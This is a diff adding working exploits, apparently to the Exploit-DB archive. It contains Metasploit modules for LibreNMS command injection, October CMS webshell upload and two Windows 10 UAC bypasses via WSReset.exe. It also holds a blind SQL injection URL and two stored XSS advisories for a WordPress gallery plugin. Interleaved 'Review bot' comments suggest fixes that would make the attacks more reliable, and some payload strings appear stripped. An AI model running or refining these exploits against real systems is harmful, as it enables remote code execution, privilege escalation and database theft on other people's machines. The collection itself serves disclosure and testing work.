diff --git a/exploits/linux/remote/47375.rb b/exploits/linux/remote/47375.rb
new file mode 100755
index 000000000..a10dbe03a
--- /dev/null
+++ b/exploits/linux/remote/47375.rb
@@ -0,0 +1,231 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'LibreNMS Collectd Command Injection', + 'Description' => %q( + This module exploits a command injection vulnerability in the + Collectd graphing functionality in LibreNMS. + + The `to` and `from` parameters used to define the range for + a graph are sanitized using the `mysqli_escape_real_string()` + function, which permits backticks. These parameters are used + as part of a shell command that gets executed via the `passthru()` + function, which can result in code execution. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Eldar Marcussen', # Vulnerability discovery + 'Shelby Pace' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2019-10669' ], + [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + [ 'Linux', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' } + } + ] + ], + 'DisclosureDate' => '2019-07-15', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]), + OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]), + OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]) + ]) + end + + def check + res = send_request_cgi!('method' => 'GET', 'uri' => target_uri.path) + return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms') + + about_res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'pages', 'about.inc.php') + ) + + return Exploit::CheckCode::Detected unless about_res && about_res.code 
== 200 + + version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/) + return Exploit::CheckCode::Detected unless version && version.length > 1 + vprint_status("LibreNMS version #{version[1]} detected") + version = Gem::Version.new(version[1]) + + return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50') + end + + def login + login_uri = normalize_uri(target_uri.path, 'login') + res = send_request_cgi('method' => 'GET', 'uri' => login_uri) + fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200 + + cookies = res.get_cookies + login_res = send_request_cgi( + 'method' => 'POST', + 'uri' => login_uri, + 'cookie' => cookies, + 'vars_post' => + { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ) + + fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302 + + cookies = login_res.get_cookies + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + 'cookie' => cookies + ) + fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices') + + print_status('Successfully logged into LibreNMS. Storing credentials...') + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + login_res.get_cookies + end + + def get_version + uri = normalize_uri(target_uri.path, 'about') + + res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies ) + fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200 + + html = res.get_html_document + version = html.search('tr//td//a') + fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty? 
+ version.each do |e| + return $1 if e.text =~ /(\d+\.\d+\.?\d*)/ + end + end + + def get_device_ids + version = get_version + print_status("LibreNMS version: #{version}") + + if version && Gem::Version.new(version) < Gem::Version.new('1.50') + dev_uri = normalize_uri(target_uri.path, 'ajax_table.php') + format = '+list_detail' + else + dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device') + format = 'list_detail' + end + + dev_res = send_request_cgi( + 'method' => 'POST', + 'uri' => dev_uri, + 'cookie' => @cookies, + 'vars_post' => + { + 'id' => 'devices', + 'format' => format, + 'current' => '1', + 'sort[hostname]' => 'asc', + 'rowCount' => 50 + } + ) + + fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200 + + json = JSON.parse(dev_res.body) + fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty? + + json = json['rows'] + fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty? + + hosts = [] + json.each do |row| + hostname = row['hostname'] + next if hostname.nil? + + id = hostname.match('href=\"device\/device=(\d+)\/') + next unless id && id.length > 1 + hosts << id[1] + end + + fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty? + + hosts + end + + def get_plugin_info(id) + uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd") + + res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies ) + return unless res && res.code == 200 + + html = res.get_html_document + plugin_link = html.at('div[@class="col-md-3"]//a/@href') + return if plugin_link.nil? 
+ + plugin_link = plugin_link.value + plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }] + c_plugin = plugin_hash['c_plugin'] + c_type = plugin_hash['c_type'] + c_type_instance = plugin_hash['c_type_instance'] || '' + c_plugin_instance = plugin_hash['c_plugin_instance'] || '' + + return c_plugin, c_type, c_plugin_instance, c_type_instance + end + + def exploit + req_uri = normalize_uri(target_uri.path, 'graph.php') + @cookies = login + + dev_ids = get_device_ids + + collectd_device = -1 + plugin_name = nil + plugin_type = nil + plugin_instance = nil + plugin_type_inst = nil + dev_ids.each do |device| + collectd_device = device + plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device) + break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst) + collectd_device = -1 + end + + fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1 + print_status("Sending payload via device #{collectd_device}") + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => req_uri, + 'cookie' => @cookies, + 'vars_get' => + { + 'device' => collectd_device, + 'type' => 'device_collectd', + 'to' => Rex::Text.rand_text_numeric(10), + 'from' => "1`#{payload.encoded}`", + 'c_plugin' => plugin_name, + 'c_type' => plugin_type, + 'c_plugin_instance' => plugin_instance, + 'c_type_instance' => plugin_type_inst + } + ) + end +end \ No newline at end of file diff --git a/exploits/php/remote/47376.rb b/exploits/php/remote/47376.rb new file mode 100755 index 000000000..48047c147 --- /dev/null +++ b/exploits/php/remote/47376.rb 
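Review bot: `check` returns `nil` for any LibreNMS newer than 1.50, because its last expression is `return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50')` with no alternative, and a nil check result is neither Safe nor Detected for the framework's check handling. Add an explicit final result after that line, e.g. `Exploit::CheckCode::Safe` (or `Detected` if 1.50 is not known to be the fix boundary — elsewhere the module only uses 1.50 as the point where the device-table endpoint moved from `ajax_table.php` to `ajax/table/device`). The description names `mysqli_escape_real_string()`, which is not a PHP function; presumably `mysqli_real_escape_string()` is meant. In `get_device_ids`, `JSON.parse(dev_res.body)` and `json['rows']` are unguarded, so a non-JSON reply or a missing `rows` key raises instead of reaching the intended `fail_with` message; rescue `JSON::ParserError` and test `rows` for nil before calling `.empty?`.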
@@ -0,0 +1,157 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'October CMS Upload Protection Bypass Code Execution', + 'Description' => %q{ + This module exploits an Authenticated user with permission to upload and manage media contents can + upload various files on the server. Application prevents the user from + uploading PHP code by checking the file extension. It uses black-list based + approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ + Definitions.php:blockedExtensions(). + This module was tested on October CMS version v1.0.412 on Ubuntu. + }, + 'Author' => + [ + 'Anti Räis', # Discovery + 'Touhid M.Shaikh ', # Metasploit Module + 'SecureLayer7.net' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB','41936'], + ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'], + ['CVE','2017-1000119'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'October CMS v1.0.412', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 25 2017')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 
'framework.js') + }) + rescue + vprint_error('Unable to access the /assets/js/framework.js file') + return CheckCode::Unknown + end + + if res && res.code == 200 + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'), + 'method' => 'GET' + }) + + if res.nil? + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + /name="_session_key" type="hidden" value="(?[A-Za-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil? + + /name="_token" type="hidden" value="(?[A-Za-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil? + vprint_good("Token for login : #{token}") + vprint_good("Session Key for login : #{session}") + + cookies = res.get_cookies + vprint_status('Trying to Login ......') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'), + 'cookie' => cookies, + 'vars_post' => Hash[{ + '_session_key' => session, + '_token' => token, + 'postback' => '1', + 'login' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # if we redirect. then we assume we have authenticated cookie. 
+ if res.code == 302 + print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") + end + end + + + def exploit + cookies = login + + evil = "" + payload_name = "#{rand_text_alpha(8..13)}.php5" + + post_data = Rex::MIME::Message.new + post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"') + post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}") #payload + data = post_data.to_s + + register_files_for_cleanup(payload_name) + vprint_status("Trying to upload malicious #{payload_name} file ....") + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'backend', 'cms', 'media'), + 'method' => 'POST', + 'cookie' => cookies, + 'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' }, + 'Connection' => 'close', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + send_request_cgi({ + 'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name), + 'method' => 'GET' + }) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47371.txt b/exploits/php/webapps/47371.txt new file mode 100644 index 000000000..a9f7c8c93 --- /dev/null +++ b/exploits/php/webapps/47371.txt 
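Review bot: The media-upload response `res` in `exploit` is never inspected, so a rejected upload still leads to the GET on `storage/app/media/<name>` and the module exits quietly with no shell; add `fail_with(Failure::UnexpectedReply, 'Media upload failed') unless res && res.code == 200` before the trigger request. Cleanup of the dropped webshell is fragile: `register_files_for_cleanup(payload_name)` registers a bare filename, which is only removed if the session's working directory happens to be the media directory, so registering the server-side path of `storage/app/media/#{payload_name}` (or at least printing it so the operator can remove it) would be safer. As rendered here `evil = ""` and the `(?...)` capture groups in `login` appear to have lost their angle-bracketed text in extraction; if the empty `evil` is real rather than an artifact, the uploaded `.php5` file carries no payload at all.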
@@ -0,0 +1,36 @@ +# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection +# inurl:"\wp-content\plugins\photo-gallery" +# Date: 09-10-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: https://10web.io/ +# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip +# Version: Up to v1.5.34 +# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap +# CVE : 2019-16119 + +# Software description: +Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. + + +# Technical Details & Impact: +Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from +them. + +# POC +In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC, + +1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=&width=785&height=550&bwg_nonce=9e367490cc& + +2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc& + + +# Timeline +09-01-2019 - Vulnerability Reported +09-03-2019 - Vendor responded +09-04-2019 - New version released (1.5.35) +09-10-2019 - Full Disclosure + +# References: +https://wordpress.org/plugins/photo-gallery/#developers +https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119 \ No newline at end of file diff --git a/exploits/php/webapps/47372.txt b/exploits/php/webapps/47372.txt new file mode 100644 index 000000000..a1dd2ff24 --- /dev/null 
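Review bot: The PoC URLs hard-code `bwg_nonce=9e367490cc`, but a WordPress admin-ajax nonce is presumably bound to the logged-in user and session, so a reader must be told to harvest a fresh nonce (and an authenticated `wp-admin` session cookie) from the Gallery Group page before replaying; as written the requests would be rejected. The advisory also never states the privilege required: the endpoint is reached through `wp-admin/admin-ajax.php` from the gallery-management UI, so a line such as `Requires an authenticated user with access to the Photo Gallery admin pages` belongs under Technical Details, since that bounds the impact claim about deleting the database.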
+++ b/exploits/php/webapps/47372.txt @@ -0,0 +1,38 @@ +# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting +# inurl:"\wp-content\plugins\photo-gallery" +# Date: 09-10-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: https://10web.io/ +# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip +# Version: Up to v1.5.34 +# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows +# CVE : 2019-16117 + +# Software description: +Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. + + +# Technical Details & Impact: +XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. + + +# POC + +1. In Add Gallery/Images tab +2. Edit current image gallery +3. In Alt/Title or Description text area add XSS payload e.g; + + +4. Click Save and preview. +5. It will show pop-up confirming existence of XSS vulnerability + +# Timeline +09-01-2019 - Vulnerability Reported +09-03-2019 - Vendor responded +09-04-2019 - New version released (1.5.35) +09-10-2019 - Full Disclosure + +# References: +https://wordpress.org/plugins/photo-gallery/#developers +https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117 \ No newline at end of file diff --git a/exploits/php/webapps/47373.txt b/exploits/php/webapps/47373.txt new file mode 100644 index 000000000..2f9c8ceca --- /dev/null +++ b/exploits/php/webapps/47373.txt 
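Review bot: Step 3 says `add XSS payload e.g;` but no example payload follows in the hunk as shown — presumably the angle-bracketed example was stripped as markup — so the PoC cannot be reproduced as it reads; restate the payload with escaped brackets or describe it in words (an `img` element with an `onerror` handler, for instance). The advisory also does not say who can reach the injection point (editing a gallery requires an authenticated user with Photo Gallery access) or who is affected by the stored payload (any user viewing the gallery, including front-end visitors if the Alt/Title or Description field is rendered there), which is what a reader needs to judge severity; a sentence under Technical Details would be more useful than the generic XSS definition.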
@@ -0,0 +1,38 @@ +# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting +# inurl:"\wp-content\plugins\photo-gallery" +# Date: 09-10-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: https://10web.io/ +# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip +# Version: Up to v1.5.34 +# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows +# CVE : 2019-16118 + +# Software description: +Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. + + +# Technical Details & Impact: +XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. + + +# POC + +1. Go to options tab select watermark tab +2. Select text as watermark type +3. Add watermark text as XSS payload e.g; +"'> 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)', + 'Description' => %q{ + This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool + is run with the "autoElevate" property set to true, however it can be moved to + a new Windows directory containing a space (C:\Windows \System32\) where, upon + execution, it will load our payload dll (propsys.dll). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'ACTIVELabs', # discovery + 'sailay1996', # poc + 'timwr', # metasploit module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [[ 'Automatic', {} ]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'EXITFUNC' => 'process', + 'WfsDelay' => 15 + }, + 'DisclosureDate' => 'Aug 22 2019', + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ], + }, + 'References' => [ + ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'], + ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'], + ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'], + ], + ) + ) + end + + def check + if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") + return CheckCode::Appears + end + CheckCode::Safe + end + + def exploit + if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + end + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] != payload.arch.first + fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target') + end + + check_permissions! + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. 
This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + exploit_win_dir = "C:\\Windows \\" + exploit_dir = "C:\\Windows \\System32\\" + exploit_file = exploit_dir + "WSReset.exe" + unless exists? exploit_win_dir + print_status("Creating directory '#{exploit_win_dir}'...") + session.fs.dir.mkdir(exploit_win_dir) + end + unless exists? exploit_dir + print_status("Creating directory '#{exploit_dir}'...") + session.fs.dir.mkdir(exploit_dir) + end + unless exists? exploit_file + session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file) + end + + payload_dll = "C:\\Windows \\System32\\propsys.dll" + print_status("Creating payload '#{payload_dll}'...") + payload = generate_payload_dll + write_file(payload_dll, payload) + print_status("Executing WSReset.exe...") + begin + session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true}) + rescue ::Exception => e + print_error(e.to_s) + end + print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!") + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + print_status('UAC is Enabled, checking level...') + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! 
Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end \ No newline at end of file diff --git a/exploits/windows/local/47378.rb b/exploits/windows/local/47378.rb new file mode 100755 index 000000000..fb2621c93 --- /dev/null +++ b/exploits/windows/local/47378.rb 
@@ -0,0 +1,156 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Post::Windows::Priv + include Post::Windows::Runas + + def initialize(info = {}) + super( + update_info(info, + 'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry', + 'Description' => %q( + This module exploits a flaw in the WSReset.exe file associated with the Windows + Store. This binary has autoelevate privs, and it will run a binary file + contained in a low-privilege registry location. By placing a link to + the binary in the registry location, WSReset.exe will launch the binary as + a privileged user. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'ACTIVELabs', # discovery + 'sailay1996', # poc + 'bwatters-r7', # metasploit module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [[ 'Automatic', {} ]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'WfsDelay' => 15 + }, + 'DisclosureDate' => 'Feb 19 2019', + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] + }, + 'References' => [ + ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'], + ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'], + ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'], + ] + ) + ) + register_options( + [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])] + ) + + end + + def check + if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") + return CheckCode::Appears + end + + CheckCode::Safe + end + + def exploit + check_permissions! 
+ case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + # get directory locations straight + win_dir = session.sys.config.getenv('windir') + vprint_status("win_dir = " + win_dir) + tmp_dir = session.sys.config.getenv('tmp') + vprint_status("tmp_dir = " + tmp_dir) + exploit_dir = win_dir + "\\System32\\" + vprint_status("exploit_dir = " + exploit_dir) + reset_filepath = exploit_dir + "WSReset.exe" + vprint_status("exploit_file = " + reset_filepath) + + # make payload + payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe' + payload_pathname = tmp_dir + '\\' + payload_name + vprint_status("payload_pathname = " + payload_pathname) + vprint_status("Making Payload") + payload = generate_payload_exe + reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}" + vprint_status("reg_command = " + reg_command) + registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" + + + # make registry changes + vprint_status("Making Registry Changes") + begin + registry_createkey(registry_key) + registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ") + registry_setvaldata(registry_key, '', reg_command, "REG_SZ") + rescue ::Exception => e + print_error(e.to_s) + end + vprint_status("Registry Changes Complete") + # Upload payload + vprint_status("Uploading Payload to #{payload_pathname}") + write_file(payload_pathname, payload) + vprint_status("Payload Upload Complete") + + vprint_status("Launching " + 
reset_filepath) + begin + session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true) + rescue ::Exception => e + print_error(e.to_s) + end + print_warning("This exploit requires manual cleanup of '#{payload_pathname}!") + # wait for a few seconds before cleaning up + sleep(20) + vprint_status("Removing Registry Changes") + registry_deletekey(registry_key) + vprint_status("Registry Changes Removed") + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + print_status('UAC is Enabled, checking level...') + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e8bdd9282..68d818a69 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
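Review bot: Both `rescue ::Exception => e` blocks in `exploit` catch everything and only print, so a failed `registry_createkey`/`registry_setvaldata` still leads to the payload being written to `%TMP%` and `WSReset.exe` being launched, leaving a useless executable on disk; rescue `::Rex::Post::Meterpreter::RequestError` and `fail_with(Failure::Unknown, e.to_s)` instead of continuing. The module includes `Msf::Exploit::FileDropper` but never registers `payload_pathname`, relying on the `This exploit requires manual cleanup` warning — if the intent is that the elevated process may still hold the file open, say so in a comment, otherwise call `register_file_for_cleanup(payload_pathname)` right after `write_file`. `reg_command` embeds `payload_pathname` unquoted after `cmd.exe /c start`, so a `%TMP%` containing spaces breaks the launch; `"cmd.exe /c start \"\" \"#{payload_pathname}\""` avoids that and `start`'s first-quoted-argument-is-title behaviour. Finally, `registry_deletekey(registry_key)` runs only after a fixed `sleep(20)`, so a session drop or exception during the wait leaves the `Shell\open\command` hijack in place; wrap the launch and wait in `begin ... ensure` so the key is always removed.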
@@ -10676,6 +10676,8 @@ id,file,description,date,author,type,platform,port
 47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows,
 47344,exploits/linux/local/47344.rb,"ktsuss 1.4 - suid Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
 47345,exploits/linux/local/47345.rb,"ptrace - Sudo Token Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux,
+47377,exploits/windows/local/47377.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)",2019-09-10,Metasploit,local,windows,
+47378,exploits/windows/local/47378.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)",2019-09-10,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17662,6 +17664,8 @@ id,file,description,date,author,type,platform,port
 47353,exploits/linux/remote/47353.rb,"AwindInc SNMP Service - Command Injection (Metasploit)",2019-09-05,Metasploit,remote,linux,
 47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple,
 47358,exploits/linux/remote/47358.py,"FusionPBX 4.4.8 - Remote Code Execution",2019-09-06,Askar,remote,linux,
+47375,exploits/linux/remote/47375.rb,"LibreNMS - Collectd Command Injection (Metasploit)",2019-09-10,Metasploit,remote,linux,
+47376,exploits/php/remote/47376.rb,"October CMS - Upload Protection Bypass Code Execution (Metasploit)",2019-09-10,Metasploit,remote,php,
